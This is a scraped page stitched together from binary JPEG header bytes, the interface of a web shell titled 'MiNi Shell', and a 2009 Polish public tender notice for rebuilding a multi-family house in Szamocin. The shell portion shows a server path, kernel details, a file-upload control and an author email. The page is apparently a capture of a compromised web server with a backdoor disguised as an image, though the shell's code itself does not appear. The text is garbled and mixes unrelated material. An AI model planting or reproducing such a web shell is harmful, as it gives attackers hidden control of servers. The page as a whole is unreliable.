JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090302/45698-N-2009.html

<p class="kh_header"><b>Szamocin: PRZEBUDOWA I  ROZBUDOWA   WIELORODZINNEGO  BUDYNKU  MIESZKALNEGO  W SZAMOCINIE  UL. PADEREWSKIEGO 30</b><br>
<b>Numer ogłoszenia: 45698 - 2009; data zamieszczenia: 02.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Szamocin , Pl. Wolności 19, 64-820 Szamocin, woj. wielkopolskie, tel. 067 2848003, faks 067 2848065.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szamocin.umig.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA I  ROZBUDOWA   WIELORODZINNEGO  BUDYNKU  MIESZKALNEGO  W SZAMOCINIE  UL. PADEREWSKIEGO 30.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEBUDOWA I  ROZBUDOWA   WIELORODZINNEGO  BUDYNKU  MIESZKALNEGO  W SZAMOCINIE  UL. PADEREWSKIEGO 30 
 
Zakres-rodzaje prac 
Projektowane przedsięwzięcie przewiduje częściową rozbiórkę budynku mieszkalnego, częściową rozbiórkę budynku gospodarczego, wykonanie stropu oraz murów  piętra, wykonanie nowej konstrukcji dachu i pokrycia. W części gospodarczej, która zostanie przebudowana  na  mieszkanie zostaną wykonane nowe mury i częściowo fundamenty oraz nowa konstrukcja   dachu  z pokryciem. Całość  budynku zostanie docieplona. 
Podstawowe  grupy  robót  budowlanych : 
a)	roboty  rozbiórkowe 
b)	wykopy 
c)	fundamenty
d)	ściany  parteru 
e)	ściany piętra
f)	kominy
g)	strop nad parterem 
h)	schody  wewnętrzne
i)	dach 
j)	ścianki działowe
k)	tynki wewnętrzne 
l)	sufity  podwieszone 
m)	docieplenie  ściany wewnętrznej 
n)	stolarka    okienna
o)	stolarka drzwiowa
p)	posadzki
q)	glazura, gładzie malowanie
r)	elewacje
Podstawowe  grupy  robót  elektrycznych  : 
a)	wewnętrzna  linia  zasilająca  z rozdzielnicą 
b)	zasilanie  mieszkań
c)	instalacje   elektryczne  w mieszkaniach 
d)	instalacje  w piwnicach 
e)	zasilanie   obwodów  administracyjnych 
f)	instalacja TV-sat, Tel.
g)	Instalacja  połączeń  wyrównawczych  
Podstawowe  grupy  robót  elektrycznych  : 
a)	Instalacja  c.o.
b)	Instalacja  wodociągowa
c)	Instalacja  kanalizacyjna 
d)	Instalacja  gazowa  

Wykonanie dokumentacji powykonawczej,  geodezyjnej  (inwentaryzacji). 
Uwaga!

Niedoszacowanie, pominięcie oraz brak rozpoznania zakresu przedmiotu  zamówienia nie może być podstawą do żądania zmiany wynagrodzenia ryczałtowego  określonego w  ofercie.


Szczegółowy zakres rzeczowy robót do wykonania określają:
- Przedmiar (kosztorys ślepy/ofertowy 1kpl.) robót stanowiący załącznik nr 2 do SIWZ (suma wartości w poszczególnych pozycjach robót wszystkich branż musi stanowić wartość końcową, zapisaną na druku oferty - zał. nr 1do SIWZ), Uwaga!   Przedmiar   robót  elektrycznych znajdujący się  w projekcie  budowlanym  jest nieaktualny. 
-Projekt techniczny obejmujący swoim zakresem  przedmiot zamówienia i specyfikacje techniczne wykonania i odbioru robót  (załącznik nr 3 do SIWZ, płyta CD).
Uwaga !   Na stronie internetowej znajdują się   skopiowany  projekt  w przypadku  niejasności, oryginał w wersji papierowej projektu technicznego jest do wglądu u Zamawiającego.
Użyte nazwy własne, które pojawiają się w przedmiarach robót, projekcie budowlanym, specyfikacji technicznej określają minimalny standard jakościowy  materiałów lub urządzeń przyjętych do wyceny .
Zastosowane w składanej ofercie materiały, urządzenia (ich nazwy własne) powinny być takie same lub równoważne, porównywalne z pozycjami (przykładami) zapisanymi w przedmiarach robót, projekcie budowlanym, specyfikacji technicznej. 
	Przedmiot zamówienia obejmuje również wszystkie prace i obowiązki wykonawcy wymienione we wzorze umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.10.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 12000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
    a) posiadają uprawnienia do wykonania określonej działalności lub czynności , jeżeli
        ustawy nakładają obowiązek posiadania takich uprawnień,
    b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 
        osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie 
        innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do 
        wykonania zamówienia,     
    c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
        zamówienia,
    d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
2. Udzielą 3 - letniej gwarancji na wykonany przedmiot umowy, licząc od daty odbioru
    końcowego zadania.
3. Załączą do zamówienia wykaz zrealizowanych robót budowlanych w okresie ostatnich 5 lat
    przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w
    tym okresie odpowiadających swoim rodzajem (co najmniej referencje  od  Inwestora na
    zrealizowany  jeden  budynek  wielorodzinny o   kubaturze minimum  1855,40  m3) i 
    wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich 
    wartości oraz daty i miejsc wykonania wraz z  załączeniem dokumentów - referencji  
    potwierdzających,  że roboty te zostały wykonane należycie (zał. nr 6 do SIWZ)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonania przedmiotu zamówienia oraz , że nie podlega wykluczeniu na podstawie art.24 ustawy z dnia 29 stycznia 2004 r. - Prawo Zamówień Publicznych(ze zmianami), zamawiający wymaga od wykonawcy (oferenta) złożenia w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę, następujących dokumentów:
1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do  ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem składania ofert,
2. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego  potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem opłat, podatków  lub zaświadczenia, że oferent uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert.
3. Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne , lub zaświadczenia, że oferent uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert.
Dokumenty potwierdzające spełnienie wymogów ekonomicznych i finansowych:
1. Polisę a w przypadku jej braku  innego dokumentu potwierdzającego że wykonawca jest 
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

2. Dowód wniesienia wadium ( w przypadku załączenia dokumentów np. gwarancje bankowe, ubezpieczeniowe itp.  kopia musi znajdować się wewnątrz oferty, natomiast oryginał dokumentu  należy dostarczyć Zamawiającemu przed terminem/godziną otwarcia ofert) 
Dokumenty potwierdzające posaiadania przez Wykonawcę niezbędnej wiedzy i doswiadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia :
1.Wykaz zrealizowanych robót budowlanych w okresie ostatnich 5 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsc wykonania wraz z  załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (Zał. nr 6 do SIWZ). W tym realizacja  minimum 1 zamówienie na prace w zakresie wykonanych obiektów (co najmniej referencje od  Inwestora na zrealizowany jeden budynek  wielorodzinny o   kubaturze minimum  1855,40  m3).  
2. Wykaz niezbędnego do wykonania zamówienia sprzętu, narzędzi i urządzeń, jakie posiada wykonawca (własne lub wynajęte), który będzie wykorzystany do realizacji zadania.
3. Wykaz prac-zadań jakie wykonawca zamierza zlecić podwykonawcom w trakcie realizacji przedmiotu zamówienia .( Zał. nr 7 do SIWZ).
4. Wykaz osób które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na  temat ich kwalifikacji niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności.
5. Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie posiadają wymagane uprawniania,  jeżeli ustawy wymagają obowiązek posiadania takich uprawnień,
kopie uprawnień do kierowania robotami budowlanymi (dla obiektów o kubaturze  1855,40  m3 i  rozpiętości do 12 m) osób przewidzianych do wykonania zadania w branżach:
- budowlanej w specjalności  konstrukcyjno-budowlanej,
- instalacji sanitarnej,
- instalacji elektrycznej 
łącznie z zaświadczeniem o wpisie na listę członków właściwej izby samorządu zawodowego.
6. Udzielenie pisemnej 3 - letniej gwarancji na wykonany przedmiot umowy, licząc od daty odbioru końcowego.
7. Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych wypisów 
(odpisów), wymaga się złożenia dokumentu wskazującego osobę uprawnioną do reprezentowania składającego (składających) ofertę.

UWAGA do pkt. VII
Dokumenty wystawione przez właściwe instytucje załączamy w formie oryginału lub poświadczonej za zgodność oryginałem kserokopii natomiast  sporządzone (wystawione) przez Wykonawcę powinny być w formie oświadczeń.

INNE  DOKUMENTY  KTÓRE  OFERENT  MUSI  BEZWARUNKOWO  ZŁOŻYĆ:
a) wypełniony druk oferty zał. Nr 1 do SIWZ,
b) wypełniony kosztorys ślepy-ofertowy zał. Nr 2 do SIWZ,
c) wypełniony druk oświadczenia  zał. Nr 4 do SIWZ,
d) zaparafowany - podpisany wzór umowy zał. Nr 5 do SIWZ.
Podmioty składające ofertę wspólną musza spełnić zapisy  art. 23 PZP i zobowiązane są przedłożyć wszystkie wymagane dokumenty dotyczące: opłacenia składek w  ZUS, podatków w Urzędzie Skarbowym, odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji gospodarczej bądź Krajowego Rejestru Sądowego odrębnie dla poszczególnych jednostek, natomiast wymagane inne dokumenty wymienione w pozostałych punktach należy załączyć wspólnie dla podmiotów składających ofertę wspólną..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szamocin.umig.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd miasta i Gminy Szamocin   Plac Wolnosci  19 64-820  Szamocin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2009 godzina 09:30, miejsce: Urząd  Miasta  i Gminy  Szamocin 
Plac  wolności 19 
64-820  Szamocin (  sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com